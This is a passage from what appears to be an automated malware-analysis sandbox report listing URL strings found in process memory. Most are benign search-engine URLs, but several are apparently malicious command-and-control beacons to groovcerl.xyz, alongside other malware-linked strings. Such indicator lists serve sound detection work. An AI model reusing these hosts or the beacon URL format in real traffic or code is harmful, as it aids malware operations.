            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.417318840.0000020EA8B38000.00000004.00000001.sdmpString found in binary or memory: http://crl.osofts/Microt0
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
            Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001E.00000003.477391818.000000000E9DF000.00000004.00000040.sdmpString found in binary or memory: http://groovcerl.xyz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/imaA
            Source: explorer.exe, 0000001E.00000000.440619372.000000000EE32000.00000004.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw#
            Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKv
            Source: explorer.exe, 0000001E.00000000.420488752.0000000001400000.00000002.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6C
            Source: explorer.exe, 0000001E.00000000.437533934.0000000008C57000.00000004.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/images/_2B5hZPBBeMEkvAROXtH1/WZsdWhoR7wg_2Bd_/2BoOtRydsyDG3r9/w2GcVR9gar6CncemW
            Source: explorer.exe, 0000001E.00000000.437107057.0000000008A32000.00000004.00000001.sdmpString found in binary or memory: http://groovcerl.xyz/images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQ
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, control.exe, 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000016.00000002.479407325.0000020EA04B2000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000002.512108234.0000000000EB8000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000016.00000003.389591293.0000020EA8997000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001E.00000002.527166930.00000000048F2000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000016.00000002.449986423.0000020E90451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001E.00000000.439561975.000000000DC70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.438578352.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000016.00000002.450833084.0000020E9065E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001E.00000000.439935766.000000000DD63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
